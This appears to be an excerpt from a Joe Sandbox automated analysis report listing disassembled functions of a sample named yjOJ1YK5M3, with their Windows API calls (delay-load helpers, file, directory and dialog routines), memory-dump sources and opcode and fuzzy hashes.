                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: Gdip$AllocBitmapCreateFromStream
                                        • String ID:
                                        • API String ID: 1915507550-0
                                        • Opcode ID: 40d26e3062f3a0a4d923ad9eb1023a0fc0ac8bf0375a6db8f64136e7eac3b51d
                                        • Instruction ID: cdf120a81c994bd3f668c395bf66daee41db4ccc9a5998d4da7e2419aa1c5036
                                        • Opcode Fuzzy Hash: 40d26e3062f3a0a4d923ad9eb1023a0fc0ac8bf0375a6db8f64136e7eac3b51d
                                        • Instruction Fuzzy Hash: 13D0C93432120ABADF467F61CC1297E7A99EF00358F418525BD46951E1EAB1EA30ABA1
                                        Function 00294231 Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00294256
                                          • Part of subcall function 00290678: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00290689
                                          • Part of subcall function 00290678: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0029069A
                                          • Part of subcall function 00290678: IsDialogMessageW.USER32(00010414,?), ref: 002906AE
                                          • Part of subcall function 00290678: TranslateMessage.USER32(?), ref: 002906BC
                                          • Part of subcall function 00290678: DispatchMessageW.USER32(?), ref: 002906C6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: Message$DialogDispatchItemPeekSendTranslate
                                        • String ID:
                                        • API String ID: 897784432-0
                                        • Opcode ID: d99c110430eee003fd7f1fa07e58b7555c5dd427ce4f07c19e5832a249679588
                                        • Instruction ID: a199f97a6b2b7ad71a2e4d9809f8f37598e5a12d500ba96d26c6fe284736a24f
                                        • Opcode Fuzzy Hash: d99c110430eee003fd7f1fa07e58b7555c5dd427ce4f07c19e5832a249679588
                                        • Instruction Fuzzy Hash: 59D09E36155300AEDB122B51DE0AF0A7AE6BB88B04F404654B345340F1C662AE709F16
                                        Function 00294D2C Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00294DD5: RtlAcquireSRWLockExclusive.NTDLL ref: 00294DF2
                                        • DloadProtectSection.DELAYIMP ref: 00294D54
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AcquireDloadExclusiveLockProtectSection
                                        • String ID:
                                        • API String ID: 3680172570-0
                                        • Opcode ID: 9fe1fedbf8a658d8d7b0e4ba7bf881bdaee93454b164d4bcf8339d1965c4f4cd
                                        • Instruction ID: 810f380bd881dfea3344716b09bec800f8f373eebc5e9caefd2218e52bc25886
                                        • Opcode Fuzzy Hash: 9fe1fedbf8a658d8d7b0e4ba7bf881bdaee93454b164d4bcf8339d1965c4f4cd
                                        • Instruction Fuzzy Hash: A3D0123C1307719ECF15BF24AC4EF142390BB05B14F800646F253855B8DFB8A4B3AAA1
                                        Function 0027E152 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFileType.KERNELBASE(000000FF,0027E052,?,?,?,00000000,0027E5D2,?,?,00000000,?,00000000), ref: 0027E15E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: FileType
                                        • String ID:
                                        • API String ID: 3081899298-0
                                        • Opcode ID: e930dbe418d21b8589b6e343c9626f8a2f21356fb8ae732f7500ea8c5c9b8a16
                                        • Instruction ID: 05f00fb8fc49e5fd49783e5ec62ace9f431e40cea10e3fb7d79c289411c51d16
                                        • Opcode Fuzzy Hash: e930dbe418d21b8589b6e343c9626f8a2f21356fb8ae732f7500ea8c5c9b8a16
                                        • Instruction Fuzzy Hash: 70C0023441021AD68E214E28A84A4997622AA573A67F6D7D4D02DC96A1C7338CA7EA21
                                        Function 00278180 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 00278187
                                          • Part of subcall function 00284F2B: __EH_prolog3.LIBCMT ref: 00284F32
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: H_prolog3
                                        • String ID:
                                        • API String ID: 431132790-0
                                        • Opcode ID: 0b57b58d42d387c264d2a6a2bbeb4aa63c0e85b2abbe49c4a88ff55814e6e478
                                        • Instruction ID: 2a867926c0ccd0cbaf30c152610b0dca68683578ac54a2c06e58c5620c171f24
                                        • Opcode Fuzzy Hash: 0b57b58d42d387c264d2a6a2bbeb4aa63c0e85b2abbe49c4a88ff55814e6e478
                                        • Instruction Fuzzy Hash: 97C012B4B30934C7DF02BFA4880379CA1206B50B02F400249F6005B282CFB80B218BCA
                                        Function 00294C7E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294C90
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: d83f134290fa418240b453aeacdd4893fb46026399ff44418c3551bf26e001c5
                                        • Instruction ID: 55cb863b876c0e8ea4326ba0e414bcdf3adbc8aed77b7f1f336b0505396d7d51
                                        • Opcode Fuzzy Hash: d83f134290fa418240b453aeacdd4893fb46026399ff44418c3551bf26e001c5
                                        • Instruction Fuzzy Hash: 52B012852FD001BC350431041F02C36010CC8D1B22331831FF410D058294800C730431
                                        Function 00294CAD Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294C90
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: b88ebc6df4b4044c303112b965f5b7b9ef262049379d16dd6f8fd476513436c9
                                        • Instruction ID: 246e49497d5aad1473cfc706313d7e97a4eee1fb281b411c1da1621076e23d35
                                        • Opcode Fuzzy Hash: b88ebc6df4b4044c303112b965f5b7b9ef262049379d16dd6f8fd476513436c9
                                        • Instruction Fuzzy Hash: EBB0128127D001AC350471141E02D37010CC0C1B11331822FF410C1681D4800C770531
                                        Function 00294CB7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294C90
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: e2796055fcf8da54c47bd43b00d10ff5afc982b2154c502aac059bdca6c94a8a
                                        • Instruction ID: dbeb4b344dea1cd7421a1541fd48dde5cc8827630186263838d5b4f7dd12e90f
                                        • Opcode Fuzzy Hash: e2796055fcf8da54c47bd43b00d10ff5afc982b2154c502aac059bdca6c94a8a
                                        • Instruction Fuzzy Hash: 80B0128127D002AC350471141D02E36010CC0C1B11331422FF410C1A81D4800C760531
                                        Function 00294C99 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294C90
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 72c3eaabfea461826fb0359fbcf0d3faac2293e397e59accbbb53425f38d215e
                                        • Instruction ID: 06dbc780e1c7d87fdb1735dca839936af1f5752003a7fa4c951c9d34dae05f3b
                                        • Opcode Fuzzy Hash: 72c3eaabfea461826fb0359fbcf0d3faac2293e397e59accbbb53425f38d215e
                                        • Instruction Fuzzy Hash: C3B0128127D001EC350471241D02D37010CC0C1B11331822FF800C1681D4800C760531
                                        Function 00294D22 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294CF1
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: c9e2d9b11d596a4ee2a703f21de878425249de57c7233c938b1a2bc9263ef3ad
                                        • Instruction ID: cf79fcba16c38f90ecc2d8f8f32efb06d029049a238e0507b10a753a4239c731
                                        • Opcode Fuzzy Hash: c9e2d9b11d596a4ee2a703f21de878425249de57c7233c938b1a2bc9263ef3ad
                                        • Instruction Fuzzy Hash: 99B0128527D0036C360471141D02D3B010CD0C1B11330422FF404C1581E4C10C770431
                                        Function 00294D04 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294CF1
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: f0f2da66d34b3f7394a443d89f2fa328445f77adf7bd0e154e0dfde5b96d0057
                                        • Instruction ID: 34c4c9f7922392d93d172eabcd4c64df6ac6227cf674f56248262654612d2851
                                        • Opcode Fuzzy Hash: f0f2da66d34b3f7394a443d89f2fa328445f77adf7bd0e154e0dfde5b96d0057
                                        • Instruction Fuzzy Hash: 1CB0128527D1026C374471151D02D3B010CC0C1B11330432FF404C1181E4C10CB70431
                                        Function 00294D18 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294CF1
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 710d8de0576efb3eb48b9c881352ca7f3587d3c33ba298dda9b900e149cad04c
                                        • Instruction ID: 2c478e446425c3f66e88ef7d164041b58766d34471c3bd990c57c6f905f9261c
                                        • Opcode Fuzzy Hash: 710d8de0576efb3eb48b9c881352ca7f3587d3c33ba298dda9b900e149cad04c
                                        • Instruction Fuzzy Hash: 97B0128527D0027C360471141D02D3B010CC4C2B11331821FF804C2181E4C00C7A0431
                                        Function 00282226 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetCurrentDirectoryW.KERNELBASE(?), ref: 00282233
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: CurrentDirectory
                                        • String ID:
                                        • API String ID: 1611563598-0
                                        • Opcode ID: 5f6d81c5830b6aad50e0646b4e0acb172d6ab95223eb3cdcca4eb0d70bcbf73b
                                        • Instruction ID: d004769c9ad06b72726266f00cc1bd58ae6224844f4df7c1a6de5166ec9e2fee
                                        • Opcode Fuzzy Hash: 5f6d81c5830b6aad50e0646b4e0acb172d6ab95223eb3cdcca4eb0d70bcbf73b
                                        • Instruction Fuzzy Hash: D0C04870216200DF8704DFA8EA8CA0A77AABFA2706B558469F840CB074CB34DC64DB25
                                        Function 00294CA8 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294C90
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: f6fdb39ee4769230fadd9bbf25b7ef108375c85817d18bd8964ac2dcf0b3a964
                                        • Instruction ID: 8b227b28977e6db61d3d67b1510e67926bf5dffe581e86d9b7edfb46a0028635
                                        • Opcode Fuzzy Hash: f6fdb39ee4769230fadd9bbf25b7ef108375c85817d18bd8964ac2dcf0b3a964
                                        • Instruction Fuzzy Hash: C7A002D62BE117FC390872516E07C7B021DC4C6FA23328A1FF812D5AD2A8C01DB71431
                                        Function 00294CE4 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294CF1
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 83cbf0f161390daf166967759db6f5f71a8a52b0871c8dd8d083d9e73ffbbeed
                                        • Instruction ID: f4a2ba856a821320018475497905e96a25cba758f6233ee02fa7a692c08b22a0
                                        • Opcode Fuzzy Hash: 83cbf0f161390daf166967759db6f5f71a8a52b0871c8dd8d083d9e73ffbbeed
                                        • Instruction Fuzzy Hash: A0A0019A2BE512BD3A0872616E06C7B021DD4D2B62331861AF801D5582A9811DAA1471
                                        Function 00294CFF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294CF1
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: ca461a80ce3d0c2c5a12de1cfb52f6cc11f0995fa520d0a34f00c44737e6fa0e
                                        • Instruction ID: 43fb352d493586b75684e55a503103ff82978981424b35710b1d88d089e57fd1
                                        • Opcode Fuzzy Hash: ca461a80ce3d0c2c5a12de1cfb52f6cc11f0995fa520d0a34f00c44737e6fa0e
                                        • Instruction Fuzzy Hash: 10A0019A2BE513BC3A0872616E06C7B021DD4D6BA23318A1AF802C5582A9811DAA1431
                                        Function 00294CC6 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294C90
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
